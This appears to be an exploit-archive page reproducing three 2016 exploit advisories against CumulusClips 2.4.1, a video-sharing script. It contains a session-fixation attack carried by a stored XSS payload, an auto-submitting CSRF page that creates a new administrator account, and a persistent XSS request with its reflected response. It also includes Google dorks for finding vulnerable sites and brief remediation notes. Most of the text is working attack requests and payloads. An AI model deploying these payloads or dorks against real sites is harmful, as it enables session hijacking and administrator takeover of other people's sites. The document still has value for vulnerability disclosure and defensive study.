扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 |
# Exploit Title: CumulusClips Session fixation # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Łukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. PoC: POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/ Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID% 3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C% 2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url= BOZtzZX&submitted=TRUE&button=Update+Video Remediation: Change session id after sucessful login Post exploitation: Since it is posible to impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel. ####################################################### # Exploit Title: CumulusClips XSRF and code execution # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Łukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie # CVE : [if applicable] Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. PoC: <html> <body> <form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST"> <input type="hidden" name="role" value="admin" /> <input type="hidden" name="email" value="admin@mailinator.com" /> <input type="hidden" name="username" value="newadmin" /> <input type="hidden" name="password" value="newadminpass" /> <input type="hidden" name="password-show" value="" /> <input type="hidden" name="first_name" value="" /> <input type="hidden" name="last_name" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name="about_me" value="" /> <input type="hidden" name="submitted" value="TRUE" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Remediation: Use anti-csrf token, fix all XSS'es ####################################################### # Exploit Title: CumulusClips Persistent XSS # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Łukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie # CVE : [if applicable] Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information. PoC: locations: /cumulusclips/account/videos/edit/ /cumulusclips/account/upload/video/ POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/ Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video reflected on main site: GET /cumulusclips/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/ Connection: close RESPONSE: ... div class="video"> <div class="thumbnail"> <a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>"> <img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" /> ... Post exploitation: Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel. Remediation: Validate user input for special characters (preferable white list), use HTTPonly header |
体验盒子
